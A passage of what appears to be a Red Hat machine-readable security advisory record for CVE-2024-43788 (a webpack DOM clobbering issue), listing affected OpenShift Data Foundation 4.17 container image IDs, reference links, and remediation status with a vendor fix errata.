"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", 